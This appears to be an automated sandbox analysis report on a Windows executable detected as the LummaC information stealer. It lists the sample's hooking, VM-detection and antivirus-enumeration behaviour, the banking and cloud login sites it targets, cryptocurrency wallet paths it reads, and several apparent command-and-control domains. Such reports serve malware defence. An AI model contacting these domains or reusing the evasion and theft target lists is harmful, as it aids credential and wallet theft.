              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: section name: .&u&u
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeCode function: 0_3_00752E680_3_00752E68
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000000.2055216242.00000000013B7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %0n8OriginalFilename_VersionInfo_InfoItemWWW vs Lisect_AVT_24003_G1B_131.exe
              Source: Lisect_AVT_24003_G1B_131.exeBinary or memory string: %0n8OriginalFilename_VersionInfo_InfoItemWWW vs Lisect_AVT_24003_G1B_131.exe
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000000.2055216242.00000000013B7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: Select a slide to edit from the listWW;
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109016329.00000000007E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Lisect_AVT_24003_G1B_131.exeReversingLabs: Detection: 50%
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: B-HelpAssistantWWW
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Play a multimedia file/Stop the macro for the specified amount of timeWWW,Get count of child windows of a named regionWW#Speak the contents of the clipboardWWW
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Play a multimedia file/Stop the macro for the specified amount of timeWWW,Get count of child windows of a named regionWW#Speak the contents of the clipboardWWW
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Obsolete - Use Cancel (On!)WWW&Return the METAPHONE code for a string!Return a random number in a rangeW8Return index of first matching or non-matching characterWW$Add a GroupBox control to the dialogWW-Return the mean deviation of a list of valuesW(Delete a value from the Windows RegistryWWHStarts a general browsing dialog box for connecting to network resourcesWW-Add a Frame (rectangle) control to the dialogW@Information about time the current time zone and time changeoverWW_Return the angle in radians for a specified hyperbolic cosine (inverse (arc) hyperbolic cosine)WWW*Return a string converted to a units value;Create a new instance of the specifed OLE Automation objectWWW2Get a list of detectable or convertible file types-Resume macro execution from a pause conditionW%Get enabled state of the named regionW
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile read: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Lisect_AVT_24003_G1B_131.exeStatic file information: File size 6602847 > 1048576
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: Raw size of .&u&u is bigger than: 0x100000 < 0x561c00
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: .&u&u
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: real checksum: 0x64f92b should be: 0x64f932
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: section name: .&u&u
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: section name: .&u&u
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: section name: .&u&u

              Hooking and other Techniques for Hiding and Protection

              barindex
              Overwrites code with unconditional jumps - possibly settings hooks in foreign process
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A30005 value: E9 8B 2F 4C 76 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2F90 value: E9 7A D0 B3 89 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A40005 value: E9 2B BA 47 76 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EBBA30 value: E9 DA 45 B8 89 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A50008 value: E9 8B 8E 4B 76 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76F08E90 value: E9 80 71 B4 89 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A60005 value: E9 8B 4D 01 75 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 75A74D90 value: E9 7A B2 FE 8A Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A70005 value: E9 EB EB 01 75 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 75A8EBF0 value: E9 1A 14 FE 8A Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A80005 value: E9 8B 8A 3D 75 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 75E58A90 value: E9 7A 75 C2 8A Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: A90005 value: E9 2B 02 3F 75 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 75E80230 value: E9 DA FD C0 8A Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2D40005 value: E9 5B 2E 1B 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2E60 value: E9 AA D1 E4 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2D50005 value: E9 EB 3E 1A 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF3EF0 value: E9 1A C1 E5 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2D60005 value: E9 DB 2F 19 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2FE0 value: E9 2A D0 E6 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2D80005 value: E9 BB 2D 17 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2DC0 value: E9 4A D2 E8 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2D90005 value: E9 CB 2A 16 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2AD0 value: E9 3A D5 E9 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2DA0005 value: E9 7B 2B 15 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2B80 value: E9 8A D4 EA 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2DB0005 value: E9 1B 2F 14 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2F20 value: E9 EA D0 EB 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2DC0005 value: E9 FB 2C 13 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2D00 value: E9 0A D3 EC 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2DD0005 value: E9 DB 2D 12 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2DE0 value: E9 2A D2 ED 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2DE0005 value: E9 AB 3E 11 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF3EB0 value: E9 5A C1 EE 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2DF0005 value: E9 2B 2F 10 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2F30 value: E9 DA D0 EF 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E00005 value: E9 9B 2F 0F 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2FA0 value: E9 6A D0 F0 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E10005 value: E9 0B 2D 0E 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2D10 value: E9 FA D2 F1 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E20005 value: E9 CB 3B 0D 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF3BD0 value: E9 3A C4 F2 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E30005 value: E9 2B 2D 0C 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2D30 value: E9 DA D2 F3 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E40005 value: E9 4B 47 0B 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF4750 value: E9 BA B8 F4 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E50005 value: E9 BB 2C 0A 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2CC0 value: E9 4A D3 F5 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E60005 value: E9 5B 2B 09 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2B60 value: E9 AA D4 F6 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 2E70005 value: E9 6B 2B 08 74 Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeMemory written: PID: 4424 base: 76EF2B70 value: E9 9A D4 F7 8B Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 1295EC7
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 11CBAFB
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 1296DBD
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 123CB96
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 12AB0D3
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 1210F89
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 11C72F8
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 11DAFF0
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 135B37A
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 11DA135
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 1381BA2
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 1307EFD
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeAPI/Special instruction interceptor: Address: 12DEC54
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe TID: 380Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe TID: 380Thread sleep time: -30000s >= -30000sJump to behavior
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108948527.0000000003788000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108948527.0000000003788000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2109162142.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: associationokeo.shop
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: turkeyunlikelyofw.shop
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: pooreveningfuseor.pw
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: edurestunningcrackyow.fun
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: detectordiscusser.shop
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: problemregardybuiwo.fun
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: lighterepisodeheighte.fun
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: technologyenterdo.shop
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: resergvearyinitiani.shop
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2170910908.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206649428.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2209302108.0000000003750000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2208131381.00000000007F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Jaxx Liberty
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: window-state.json
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: Wallets/Ethereum
